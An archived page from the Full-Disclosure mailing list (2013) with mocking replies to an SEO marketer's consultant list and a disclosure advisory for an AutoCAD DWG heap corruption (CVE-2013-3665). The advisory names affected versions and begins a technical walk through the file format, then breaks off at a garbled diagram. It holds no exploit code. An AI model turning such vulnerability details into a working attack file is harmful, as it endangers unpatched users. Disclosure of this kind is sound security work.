>> CONTACT: resea...@vulnerability-lab.com
>>
>>
>> ___
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/







-- 
Robert Q Kim
SEO Marketing Advisor Google Page 1
http://sparkah.com/google
2611 S Coast Highway
San Diego, CA 92007
310 598 1606

Re: [Full-disclosure] Top Information Security Consultants to Hire -- WANTED

2013-07-24 Thread Gary Baribault
You're not too terribly quick are you???

Gary B


On 07/24/2013 06:31 PM, Bob iPhone Kim wrote:
> OK... guys...
>
> I figured out a simple way to organize and get you on the Top 100
> Infosec Consultants List at:
> -
> http://sparkah.com/top-infosec-information-security-and-network-security-consultants-in-the-world/
>
> Just add your name, url, and avatar to this google docs form and I'll
> just copy-paste you into the list as I delete some of the guys on the
> list who aren't looking for clients...
>
> here it is... http://bit.ly/13bBB8E
>
> Robert Kim
> http://sparkah.com
> San Diego, CA
> 310 598 1606
>
> On Wed, Jul 24, 2013 at 7:40 AM, Julius Kivimäki
> <julius.kivim...@gmail.com> wrote:
>
>> Why am I not surprised vulnlab is the first one to post here to
>> advertise themselves?
>>
>>
>> 2013/7/24 Vulnerability Lab <resea...@vulnerability-lab.com>
>>
>>> http://www.evolution-sec.com
>>> International Team, Top Researchers and Consultants, Certified
>>> Consultants, Public References and Information.
>>>
>>> ~bkm
>>>
>>> --
>>> VULNERABILITY LABORATORY RESEARCH TEAM
>>> DOMAIN: www.vulnerability-lab.com
>>> CONTACT: resea...@vulnerability-lab.com








> --
> Robert Q Kim
> SEO Marketing Advisor Google Page 1
> http://sparkah.com/google
> 2611 S Coast Highway
> San Diego, CA 92007
> 310 598 1606




[Full-disclosure] CVE-2013-3665 - AutoCAD DWG-AC1021 Memory Corruption

2013-07-24 Thread Felipe Manzano
Upgrade your AutoCAD or DWG related software:

Original advisory:
http://usa.autodesk.com/adsk/servlet/ps/dl/item?id=21972896&linkID=9240618&siteID=123112


Title: AutoCAD DWG-AC1021 Heap Corruption
Product: Autodesk AutoCAD
Advisory ID: BINA-20130724
CVE ID: CVE-2013-3665
Class: Boundary Error Condition (Buffer Overflow)
Vulnerability class: Client side/ file format
Permalink: http://binamuse.com/advisories/BINA-20130724.txt
Vendor notified on: 2013-03-27
Patch/Fix Released: 2013-07-10
Advisory Published: 2013-07-24

Vulnerability Description:

 AutoCAD is software for computer-aided design (CAD) and technical drawing in
 2D/3D, being one of the world's leading CAD design tools. It is developed and
 sold by Autodesk, Inc.

 AutoCad is vulnerable to an arbitrary pointer dereference vulnerability, which
 can be exploited by malicious remote attackers to compromise a user's system.
 This issue is due to AutoCad's failure to properly bounds-check data in a DWG
 file before using it to index and copy heap memory values. This can be
 exploited to execute arbitrary code by opening a specially crafted DWG file,
 version AC1021.

 This version was the native file format of AutoCAD Release 2007. New versions
 of the format emerged but AC1021 is still supported in modern AutoCADs for
 backward compatibility.

Vulnerable Packages:

 AutoCAD(R) 2014
 AutoCAD(R) 2013
 AutoCAD(R) 2012
 AutoCAD(R) 2011
 AutoCAD(R) Architecture 2014
 AutoCAD(R) Architecture 2013
 AutoCAD(R) Architecture 2012
 AutoCAD(R) Architecture 2011
 AutoCAD(R) Civil 3D(R) 2014
 AutoCAD(R) Civil 3D(R) 2013
 AutoCAD(R) Civil 3D(R) 2012
 AutoCAD(R) Civil 3D(R) 2011
 AutoCAD(R) ecscad 2014
 AutoCAD(R) ecscad 2013
 AutoCAD(R) ecscad 2012
 AutoCAD(R) ecscad 2011
 AutoCAD(R) Electrical 2014
 AutoCAD(R) Electrical 2013
 AutoCAD(R) Electrical 2012
 AutoCAD(R) Electrical 2011
 AutoCAD LT(R) 2014
 AutoCAD LT(R) 2013
 AutoCAD LT(R) 2012
 AutoCAD LT(R) 2011
 AutoCAD(R) Map 3D 2014
 AutoCAD(R) Map 3D 2013
 AutoCAD(R) Map 3D 2012
 AutoCAD(R) Map 3D 2011
 AutoCAD(R) Mechanical 2014
 AutoCAD(R) Mechanical 2013
 AutoCAD(R) Mechanical 2012
 AutoCAD(R) Mechanical 2011
 AutoCAD(R) MEP 2014
 AutoCAD(R) MEP 2013
 AutoCAD(R) MEP 2012
 AutoCAD(R) MEP 2011
 AutoCAD(R) PID 2014
 AutoCAD(R) PID 2013
 AutoCAD(R) PID 2012
 AutoCAD(R) PID 2011
 AutoCAD(R) Plant 3D 2014
 AutoCAD(R) Plant 3D 2013
 AutoCAD(R) Plant 3D 2012
 AutoCAD(R) Plant 3D 2011
 AutoCAD(R) Structural Detailing 2014
 AutoCAD(R) Structural Detailing 2013
 AutoCAD(R) Structural Detailing 2012
 AutoCAD(R) Structural Detailing 2011
 AutoCAD(R) Utility Design 2014
 AutoCAD(R) Utility Design 2012
 DWG TrueView(TM) 2014
 DWG TrueView(TM) 2013
 DWG TrueView(TM) 2012
 DWG TrueView(TM) 2011

Not Vulnerable Packages:

 None

Solution/Vendor Information/Workaround:

 http://images.autodesk.com/adsk/files/CodeExecutionVulnerabilityHotfix.exe

Credits:

 This vulnerability was found by Joshep J. Cortez Sanchez of the
 Binamuse Vulnerability Research Team, http://binamuse.com

Technical Description:

 The R2007 dwg format is composed of sections and pages. Sections come in two
 flavors: system sections and data sections. The system sections contain
 information about where the data sections and their pages are in the file.

 The system sections are built on two main data structures: a first header
 and a second header. In addition, there are two important sections in the
 file structure, the page map and the section map. Each one of these sections
 should be decoded using the Reed Solomon algorithm and optionally be
 compressed with a proprietary algorithm (which we will ignore).

 The file structure looks like this:


 [ASCII diagram garbled in extraction. Recoverable labels: the DWG file
 contains a 1st Header, a Page Map and a Sections Map; the 1st Header is
 Reed Solomon decoded into Header Values, Header CRC and a (Compressed)
 Second Header, which is decompressed into Page Count, Page Max ID,
 Page Map Offset and Page Map Len. The diagram, and the message, are
 truncated at this point.]

Re: [Full-disclosure] Top Information Security Consultants to Hire -- WANTED

2013-07-24 Thread Tweedle Doh
On Wed, Jul 24, 2013 at 11:40 PM, Gary Baribault <g...@baribault.net> wrote:

> On 07/24/2013 06:31 PM, Bob iPhone Kim wrote:
>
>> OK... guys...
>>
>>
>> I figured out a simple way to organize and get you
>> on the Top 100 Infosec Consultants List
>
> You're not too terribly quick are you???

He's an SEO Marketing Advisor and he has a 5 man crackerjack
programming team .. I think it must be serious :-)

Tweedle
--
You will lose an important disk file.
